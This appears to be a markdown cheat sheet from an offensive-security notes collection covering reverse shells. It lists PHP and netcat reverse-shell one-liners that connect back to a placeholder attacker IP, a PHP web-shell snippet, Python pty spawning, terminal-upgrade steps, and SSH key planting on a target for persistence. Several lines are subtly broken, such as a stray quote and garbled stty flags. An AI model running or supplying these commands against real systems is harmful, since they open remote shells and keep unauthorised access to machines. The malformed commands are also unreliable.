killchain-compendium/reverse_shells/docs/shell_collection.md

Upgrade Reverse Shell

Via interpreter

PHP

• reverse shell

php -r '$sock=fsockopen("<attacker-IP>", <attacker-Port>);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r 'exec ("/bin/bash")";' 

• Sometimes even

php -e 'exec "/bin/bash";'

Python

python -c 'import pty; pty.spawn("/bin/bash")'

Next

1. ctrl + z
2. stty echo -raw
3. fg
4. export TERM=xterm

Via SSH

• ssh-keygen
• copy priv key and chmod 600
• cat id_rsa.pub > authorized_keys on target

As Code

PHP

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP> <attacker-PORT> > /tmp/f') ?>